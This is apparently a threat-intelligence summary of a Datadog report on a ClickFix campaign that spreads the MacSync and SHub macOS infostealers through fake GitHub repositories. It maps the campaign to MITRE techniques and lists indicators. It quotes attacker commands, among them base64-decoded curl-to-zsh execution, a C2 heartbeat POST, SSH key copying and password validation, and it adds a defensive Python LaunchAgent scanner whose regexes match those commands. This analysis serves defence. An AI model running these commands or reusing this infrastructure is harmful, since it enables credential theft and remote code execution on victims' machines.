Tech impersonators: ClickFix and MacOS infostealers

Datadog observed an active campaign using fake GitHub repositories and ClickFix landing pages to social-engineer victims into pasting commands that install macOS infostealers and (in some builds) Windows components. The actor iterates on MacSync and a persistent SHub Stealer v2.0—adding credential validation, broad file and wallet collection, dynamic anti-analysis, and a LaunchAgent-based beacon for remote command execution. #SHub #MacSync

Keypoints

  • Threat actor uses impersonating GitHub repositories and SEO-optimized pages to redirect victims to ClickFix pages that instruct users to copy/paste commands into Terminal/PowerShell.
  • Initial access relies on the ClickFix “copy/paste command” tradecraft, shifting execution decisions to victims and enabling scalable delivery across lures and platforms.
  • Campaign delivered macOS infostealers MacSync and SHub v2.0; SHub v2.0 adds persistence (LaunchAgent), remote command execution, improved password validation, and expanded wallet/enterprise collection.
  • Stagers and delivery vary between base64-encoded, network-delivered AppleScript and curl|shell execution to minimize on-disk artifacts and evade detections.
  • Actor collects developer/cloud artifacts, browser data, Apple Notes, and numerous desktop wallet/artifact locations; telemetry and campaign attribution are exfiltrated to Google Apps Script and actor C2s.
  • Datadog reported impersonating repos to GitHub for takedown and recommends source verification, repository validation, and user training focused on copy/paste command risks.

MITRE Techniques

  • [T1056.002] Input Capture: GUI Input Capture – Used to present a spoofed password dialog to the user for credential harvesting (‘Required Application Helper. Please enter password for continue.’).
  • [T1056] Input Capture – Implements credential validation and capture, including Directory Services checks (‘dscl . authonly’).
  • [T1005] Data from Local System – Recursively collects local developer and cloud artifacts such as SSH, AWS, and kube configs (‘cp -r ~/.ssh’).
  • [T1119] Automated Collection – Implements a size-aware folder grabber and recursive file collection using Spotlight metadata and size limits (‘set fsz to (do shell script “/usr/bin/mdls -name kMDItemFSSize -raw ” & theItem)’).
  • [T1552.001] Credentials in Files – Targets wallet and key file types and other credential-containing files via extension lists (‘set extensionsList to {“pdf”, “docx”, “doc”, “wallet”, “key”, “keys”, “db”, …}’).
  • [T1555.003] Credentials from Web Browsers – Extracts browser-stored credentials, cookies, and wallet extension data, including IndexedDB entries (‘IndexedDB entries matching the wallet ID’).
  • [T1036.005] Masquerading: Match Legitimate Name or Location – Persists using a fake GoogleUpdate binary and a legitimate-looking LaunchAgent label (‘com.google.keystone.agent.plist’).
  • [T1547.011] Boot or Logon Autostart Execution: LaunchAgent – Establishes persistence with a LaunchAgent plist configured to run at an interval (‘StartInterval’ key set to 60).
  • [T1071.001] Application Layer Protocol: Web Protocols – Uses HTTP/HTTPS for exfiltration and continuous beaconing to C2 (‘curl -s -X POST “$GATE_URL/api/bot/heartbeat”’).
  • [T1105] Ingress Tool Transfer – Delivers base64-encoded commands from C2 which are decoded and executed on the host (‘echo “$CODE” | base64 -d > /tmp/.c.sh && chmod +x /tmp/.c.sh && /tmp/.c.sh; rm -f /tmp/.c.sh’).
  • [T1059.004] Command and Scripting Interpreter: Shell – Relies on paste-to-shell execution patterns and remote script execution via decoded curl payloads (‘curl -s $(echo … | base64 -d) | zsh’).
  • [T1070.004] Indicator Removal on Host: File Deletion – Performs cleanup of staging archives and temporary payloads after exfiltration (‘rm -f /tmp/osalogging.zip’).

Indicators of Compromise

  • [C2 Domains] Actor command-and-control domains – imper-strlk5[.]com, securityfenceandwelding[.]com, and 3 more domains
  • [C2 Endpoints] Exfiltration and beaconing URIs on C2 servers – /gate, /api/bot/heartbeat, and other endpoints such as /loader.sh?build={BUILD_ID}
  • [ClickFix Staging Pages] GitHub Pages used to stage lures and redirect to ClickFix – git-tool-install.github[.]io, io-app-git.github[.]io, and 2 more pages
  • [Redirect Deeplinks] URL-shortened deeplinks used to rotate ClickFix infrastructure – pmacos.onelink[.]me/m5yY/q5vbjgvh, pwin.onelink[.]me/zmFc/dt38769z
  • [ClickFix Domains] Landing and download hosts used by the ClickFix flow – drmcdermottmd[.]com, hci-outdoors[.]com, and 2 more domains
  • [Client Metadata Exfiltration] Telemetry endpoint used to collect visitor fingerprints and campaign attribution – script.google[.]com/macros/s/AKfycbwip_VgPEumBXeWuX_OEX6huIMHfPXidiweHpHR-fGUQIqpcR-mAMAHC1JCUQyJne3n0Q/exec
  • [GitHub Accounts] Suspected actor accounts used to publish impersonating repos – bubblegum42poptart, tvoymishka30kintus, and 5 other accounts
  • [Fake Repositories] Impersonating project repositories used as lures – github.com/Datadog-Desktop-App, github.com/3Commas-App/.github, and 3 more repositories
  • [Persistence Locations] Installed persistence artifacts and LaunchAgent paths – ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate, ~/Library/LaunchAgents/com.google.keystone.agent.plist
  • [Temporary Files] Staging and exfiltration temporary files – /tmp/shub_log.zip, /tmp/.c.sh, and other staging files (e.g., /tmp/osalogging.zip, /tmp/shub_*)
  • [Trojanized Wallet Endpoints] Paths indicating trojanized wallet payloads – /exodus-asar, /atomic-asar, and other wallet-asar endpoints
  • [Sample/File Hash] Observed sample identifier – 9191101893e419eac4be02d416e4eed405ba2055441f36e564f09c19cb26271c
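As an added detection example (not code from the Datadog report), the Python below triages macOS LaunchAgent plists for the persistence pattern and indicators listed above: the com.google.keystone.agent file name bound to the fake GoogleUpdate binary under ~/Library/Application Support, a 60-second StartInterval, and the base64/curl stager fragments quoted under T1105 and T1059.004. The Label value inside the plist and the sample plist are assumptions constructed to match the report's indicators.

```python
"""Triage macOS LaunchAgent plists for the SHub v2.0 persistence pattern (added example)."""
import plistlib
import re
from pathlib import Path

# Indicators from the report: LaunchAgent file name and fake updater path.
SUSPECT_LABEL = "com.google.keystone.agent"  # assumed Label; the report gives the .plist file name
SUSPECT_PROGRAM = "Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate"
# Shell fragments quoted in the report's stager and beacon commands.
SHELL_PATTERNS = [r"base64\s+-[dD]", r"curl\s+-s.*\|\s*(zsh|bash|sh)\b", r"/tmp/\.c\.sh"]

def triage_launchagent(file_name: str, plist_bytes: bytes) -> list[str]:
    """Return findings for one LaunchAgent plist; an empty list means nothing matched."""
    agent = plistlib.loads(plist_bytes)
    label = agent.get("Label", "")
    args = list(agent.get("ProgramArguments") or [agent.get("Program", "")])
    program = args[0] if args else ""
    findings = []
    if (label == SUSPECT_LABEL or Path(file_name).stem == SUSPECT_LABEL) and SUSPECT_PROGRAM in program:
        findings.append("Keystone-named agent runs the fake GoogleUpdate binary (report IoC)")
    interval = agent.get("StartInterval")
    if interval is not None and interval <= 60 and "/Library/Application Support/" in program:
        findings.append(f"StartInterval {interval}s beacon from a user-writable binary")
    joined = " ".join(str(a) for a in args)
    findings.extend(f"stager/beacon shell fragment: {p}" for p in SHELL_PATTERNS if re.search(p, joined))
    return findings

def scan_launchagents(directory: Path = Path.home() / "Library" / "LaunchAgents") -> dict[str, list[str]]:
    """Run the triage over every plist in a LaunchAgents directory; unparseable files are reported too."""
    results = {}
    for plist_path in sorted(directory.glob("*.plist")):
        try:
            hits = triage_launchagent(plist_path.name, plist_path.read_bytes())
        except Exception as exc:  # a malformed plist in this directory is itself worth a look
            hits = [f"unparseable plist: {exc}"]
        if hits:
            results[str(plist_path)] = hits
    return results

# Constructed sample mirroring the report's persistence artifact (not a captured file).
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>ProgramArguments</key>
  <array><string>/Users/victim/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate</string></array>
  <key>StartInterval</key><integer>60</integer>
</dict></plist>"""
```

Running `scan_launchagents()` on a host returns only the plists that produced findings, so an empty dict is the expected result on a clean machine.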
Read more: https://securitylabs.datadoghq.com/articles/tech-impersonators-clickfix-and-macos-infostealers/